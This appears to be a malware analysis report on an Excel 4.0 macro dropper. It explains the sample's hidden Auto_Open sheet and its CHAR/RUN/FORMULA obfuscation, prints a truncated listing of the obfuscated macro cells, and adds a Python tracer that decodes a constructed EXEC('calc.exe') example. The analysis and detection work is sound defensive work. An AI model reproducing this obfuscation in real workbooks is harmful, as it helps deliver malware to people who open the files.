MALICIOUS
Risk Score: 140
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The critical finding is an Excel 4.0 (XLM) macro sheet with an Auto_Open defined name: the sheet is hidden, carries a random-looking name (fbQkaRfpY), and its macro runs as soon as the workbook is opened with macros enabled, without any VBA. The code is obfuscated in the way typical of these droppers. Numeric cells hold character codes shifted by a constant, which CHAR(cell-77) and CHAR(cell-853) formulas turn back into single characters (DK128 holds 185, so CHAR(DK128-77) at JB21 yields "l"; the constants 954 and 969 decode under the 853 offset to "e" and "t"). A long & concatenation inside FORMULA(...,CB54) assembles those characters into a new formula and writes it into cell CB54, and a chain of RUN(cell) calls passes control between cells scattered across the sheet, so no single column reads as a linear program. Because the RUN arguments are cell references rather than literal commands, the payload is only visible after the CHAR arithmetic is resolved. This staging pattern is commonly used to download and execute a further malicious stage; the listing preview below shows the decoder, not the decoded command.
Heuristics (3)

- Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs (critical, OLE_XLM_DANGEROUS_FN): the Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): the workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 38987 bytes |

SHA-256 (xlm_macros.txt): ae2ae2ca56d36a88422995554dd2142931c2e0fec59a80891e335cd178a8f5df

Preview (first 1,000 lines of the extracted script):

```
' 0085 18 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - fbQkaRfpY
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d fbQkaRfpY!IN1717
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
' fbQkaRfpY,FY3,CHAR(BE1849-77),""
' fbQkaRfpY,X4,RUN(IY941),""
' fbQkaRfpY,FY4,RUN(CK1054),""
' fbQkaRfpY,FX6,CHAR(E1448-77),""
' fbQkaRfpY,HP6,"",17.00000000000000000000
' fbQkaRfpY,FX7,RUN(DN767),""
' fbQkaRfpY,HY7,CHAR(JL989-77),""
' fbQkaRfpY,DP8,CHAR(Y1090-853),""
' fbQkaRfpY,HY8,RUN(BC381),""
' fbQkaRfpY,BR9,"",0.00000000000000000000
' fbQkaRfpY,DP9,RUN(DU1665),""
' fbQkaRfpY,DN11,"FORMULA(HW1046&BP793&ER1921&IZ1548&CQ1002&HY576&HQ1172&DA395&GE784&FE1061&IL447&GM1607&GS491&DW1108&JO1071&BL1546&CD878&JF1879&DW1792&IS1187&ET1132&JM1995&FC1581&S821&K259&IZ1522&BG1015&GL812&HP1166&FJ449&DX1650,CB54)",""
' fbQkaRfpY,EV11,CHAR(CG599-853),""
' fbQkaRfpY,DN12,RUN(EJ1104),""
' fbQkaRfpY,EV12,RUN(FZ1835),""
' fbQkaRfpY,IJ12,RUN(HN437),""
' fbQkaRfpY,DS14,"",128.00000000000000000000
' fbQkaRfpY,BD18,RUN(HO1845),""
' fbQkaRfpY,JB21,CHAR(DK128-77),""
' fbQkaRfpY,JB22,RUN(HJ1919),""
' fbQkaRfpY,IW29,"",178.00000000000000000000
' fbQkaRfpY,DV31,RUN(HF723),""
' fbQkaRfpY,BI33,"",88.00000000000000000000
' fbQkaRfpY,BB37,"",94.00000000000000000000
' fbQkaRfpY,FG37,CHAR(DU1553-853),""
' fbQkaRfpY,FG38,RUN(HH1973),""
' fbQkaRfpY,DS47,CHAR(JG1507-77),""
' fbQkaRfpY,DS48,RUN(DV53),""
' fbQkaRfpY,FZ49,"",954.00000000000000000000
' fbQkaRfpY,GG49,"",37.00000000000000000000
' fbQkaRfpY,DD50,CHAR(HH421-77),""
' fbQkaRfpY,CT51,RUN(CH1477),""
' fbQkaRfpY,DA51,RUN(FL1799),""
' fbQkaRfpY,DD51,RUN(FY254),""
' fbQkaRfpY,EF54,CHAR(CF1363-77),""
' fbQkaRfpY,EF55,RUN(HZ1594),""
' fbQkaRfpY,CI57,"",6.00000000000000000000
' fbQkaRfpY,IX57,CHAR(CK714-77),""
' fbQkaRfpY,IX58,RUN(JL1943),""
' fbQkaRfpY,CZ60,"",162.00000000000000000000
' fbQkaRfpY,IA60,RUN(HC463),""
' fbQkaRfpY,GC63,"",30.00000000000000000000
' fbQkaRfpY,BQ64,RUN(GY766),""
' fbQkaRfpY,CD65,RUN(DH1950),""
' fbQkaRfpY,CM65,"",11.00000000000000000000
' fbQkaRfpY,CM66,"",92.00000000000000000000
' fbQkaRfpY,HM67,"",182.00000000000000000000
' fbQkaRfpY,HV69,"",98.00000000000000000000
' fbQkaRfpY,M70,RUN(FB1419),""
' fbQkaRfpY,FL74,"",187.00000000000000000000
' fbQkaRfpY,BY76,RUN(FO1125),""
' fbQkaRfpY,GK89,"",90.00000000000000000000
' fbQkaRfpY,EE91,"",12.00000000000000000000
' fbQkaRfpY,DH95,"",18.00000000000000000000
' fbQkaRfpY,JI106,RUN(T871),""
' fbQkaRfpY,GP114,"",967.00000000000000000000
' fbQkaRfpY,CV115,"",19.00000000000000000000
' fbQkaRfpY,GW115,"",23.00000000000000000000
' fbQkaRfpY,BG117,"",153.00000000000000000000
' fbQkaRfpY,GD118,RUN(HD1902),""
' fbQkaRfpY,HK118,"",41.00000000000000000000
' fbQkaRfpY,CG120,"",969.00000000000000000000
' fbQkaRfpY,IG125,"",69.00000000000000000000
' fbQkaRfpY,DK128,"",185.00000000000000000000
' fbQkaRfpY,II129,"",162.00000000000000000000
' fbQkaRfpY,EJ131,"",25.00000000000000000000
' fbQkaRfpY,ET131,RUN(EB1768),""
' fbQkaRfpY,M132,"",30.00000000000000000000
' fbQkaRfpY,FW134,CHAR(U1799-853),""
' fbQkaRfpY,FW135,RUN(GW1557),""
' fbQkaRfpY,JB136,RUN(IB930),""
' fbQkaRfpY,DW137,RUN(BI1771),""
' fbQkaRfpY,FL139,"",14.00000000000000000000
' fbQkaRfpY,DR152,"",9.00000000000000000000
' fbQkaRfpY,FA153,RUN(BD18),""
' fbQkaRfpY,EC156,CHAR(EN1372-77),""
' fbQkaRfpY,EC157,RUN(O239),""
' fbQkaRfpY,CR158,"",954.00000000000000000000
' fbQkaRfpY,GF161,"",11.00000000000000000000
' fbQkaRfpY,FR166,"",174.00000000000000000000
' fbQkaRfpY,CA167,"",87.00000000000000000000
' fbQkaRfpY,GH174,"",66.00000000000000000000
' fbQkaRfpY,HK178,CHAR(DX437-77),""
' fbQkaRfpY,JL178,"",145.00000000000000000000
' fbQkaRfpY,HK179,RUN(DQ1325),""
' fbQkaRfpY,EM181,"",12.00000000000000000000
' fbQkaRfpY,BA184,RUN(HI512),""
' fbQkaRfpY,EB186,"",94.00000000000000000000
' fbQkaR ...
```

(truncated)
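The RUN()/CHAR()/FORMULA() obfuscation in the listing above can be unwound statically from the olevba output itself. The following is an added example written for this page, not code from the report, the analyzer or oletools: it parses the `Sheet,Reference,Formula,Value` lines, locates the Auto_Open entry, and walks the macro the way Excel would (execution flows down a column, RUN() jumps, FORMULA() writes the decoded text into a target cell as a live formula), resolving CHAR(cell-N) arithmetic and & concatenation along the way. The listing embedded in the block is constructed to mirror the sample's shape; its cell addresses, the +77/+853 offsets on the numeric cells, the decoded string, and the short DANGEROUS function list are assumptions made for the demonstration and are not taken from the analysed file.

```python
# Added example for this page (not code from the report or from oletools): a static
# tracer for the RUN()/CHAR()/FORMULA() obfuscation seen in the XLM listing above.
import csv
import re

# CONSTRUCTED olevba-style listing that mirrors the sample's shape.  Cell addresses,
# the +77/+853 offsets on the numeric cells and the decoded string are made up.
SAMPLE_LISTING = """\
' 0085 18 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, hidden - fbQkaRfpY
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d fbQkaRfpY!A1
' Sheet,Reference,Formula,Value
' fbQkaRfpY,A1,RUN(D1),""
' fbQkaRfpY,B1,"",146.00000000000000000000
' fbQkaRfpY,B2,"",165.00000000000000000000
' fbQkaRfpY,B3,"",920.00000000000000000000
' fbQkaRfpY,D1,CHAR(B1-77),""
' fbQkaRfpY,D2,CHAR(B2-77),""
' fbQkaRfpY,D3,CHAR(B3-853),""
' fbQkaRfpY,D4,RUN(C5),""
' fbQkaRfpY,E1,"","(""calc.exe"")"
' fbQkaRfpY,C5,"FORMULA(D1&D2&D1&D3&E1,C6)",""
' fbQkaRfpY,C7,HALT(),""
"""

AUTO_OPEN_RE = re.compile(r"Auto_Open.*?ptgRef3d\s+(\w+)!([A-Z]+\d+)")
CELL_RE = re.compile(r"^([A-Z]+)(\d+)$")
CHAR_RE = re.compile(r"^CHAR\(([A-Z]+\d+)\s*([+-])\s*(\d+)\)$")
RUN_RE = re.compile(r"^RUN\(([A-Z]+\d+)\)$")
FORMULA_RE = re.compile(r"^FORMULA\((.+),([A-Z]+\d+)\)$")
DANGEROUS = ("EXEC(", "CALL(", "REGISTER(", "FOPEN(", "FWRITE(")  # assumed short list
MAX_STEPS, MAX_DEPTH = 500, 32  # guards against RUN() loops and cyclic references


def parse_listing(text):
    """Return (Auto_Open entry 'SHEET!REF' or None, {'SHEET!REF': (formula, value)})."""
    entry, cells = None, {}
    for raw in text.splitlines():
        line = raw[2:] if raw.startswith("' ") else raw  # olevba comments out XLM lines
        m = AUTO_OPEN_RE.search(line)
        if m:
            entry = f"{m.group(1)}!{m.group(2)}"
            continue
        row = next(csv.reader([line]), [])
        if len(row) == 4 and CELL_RE.match(row[1]):  # skips BIFF records and the header
            cells[f"{row[0]}!{row[1]}"] = (row[2], row[3])
    return entry, cells


class XlmTracer:
    def __init__(self, cells):
        self.cells = dict(cells)  # copied: FORMULA() writes into the sheet
        self.events = []

    def resolve(self, sheet, ref, depth=0):
        """Value of a cell: its constant, or its CHAR()/concatenation formula evaluated."""
        if depth > MAX_DEPTH:
            raise ValueError(f"reference chain too deep at {ref}")
        formula, value = self.cells.get(f"{sheet}!{ref}", ("", ""))
        if formula:
            return self.eval_expr(sheet, formula, depth + 1)
        return float(value) if re.fullmatch(r"-?\d+(\.\d+)?", value) else value

    def eval_expr(self, sheet, expr, depth=0):
        """Evaluate the obfuscator's XLM subset: CHAR(ref+-N), "literal", ref, joined by &."""
        parts = []
        for tok in (t.strip() for t in expr.split("&")):
            if m := CHAR_RE.match(tok):
                delta = int(m.group(3)) * (1 if m.group(2) == "+" else -1)
                parts.append(chr(int(self.resolve(sheet, m.group(1), depth)) + delta))
            elif len(tok) >= 2 and tok[0] == tok[-1] == '"':
                parts.append(tok[1:-1])
            elif CELL_RE.match(tok):
                val = self.resolve(sheet, tok, depth)
                parts.append(f"{val:g}" if isinstance(val, float) else val)
            else:
                raise ValueError(f"unsupported XLM expression: {tok}")
        return "".join(parts)

    def trace(self, entry):
        """Walk from the Auto_Open cell: down the column, RUN() jumps, FORMULA() rewrites cells."""
        sheet, ref = entry.split("!")
        for _ in range(MAX_STEPS):
            here = f"{sheet}!{ref}"
            formula = self.cells.get(here, ("", ""))[0]
            if not formula or formula.upper().startswith(("HALT(", "RETURN(")):
                self.events.append(("HALT", here))
                return self.events
            if m := RUN_RE.match(formula):  # transfer of control to another cell
                self.events.append(("RUN", here, m.group(1)))
                ref = m.group(1)
                continue
            if m := FORMULA_RE.match(formula):  # decoded text becomes a live formula in target
                decoded, target = self.eval_expr(sheet, m.group(1)), f"{sheet}!{m.group(2)}"
                self.cells[target] = (decoded, "")
                self.events.append(("FORMULA", target, decoded))
            elif formula.upper().startswith(DANGEROUS):
                self.events.append(("DANGEROUS", here, formula))
            col, row = CELL_RE.match(ref).groups()
            ref = f"{col}{int(row) + 1}"  # anything else falls through to the cell below
        raise RuntimeError("step limit hit; the macro probably loops")


def analyse(listing):
    entry, cells = parse_listing(listing)
    return (entry, XlmTracer(cells).trace(entry)) if entry else (None, [])


if __name__ == "__main__":
    for event in analyse(SAMPLE_LISTING)[1]:
        print(*event)
```

On a real sample, pass the text of xlm_macros.txt to analyse() and read the FORMULA and DANGEROUS events; the decoded formula is the indicator worth extracting, not the cell soup around it. The tracer deliberately models only the functions this obfuscator uses inside FORMULA() expressions; anything else there (MID, CODE, GET.WORKSPACE guards) raises ValueError rather than silently producing garbage, and the step and depth limits keep a RUN() loop or a self-referencing cell from hanging triage.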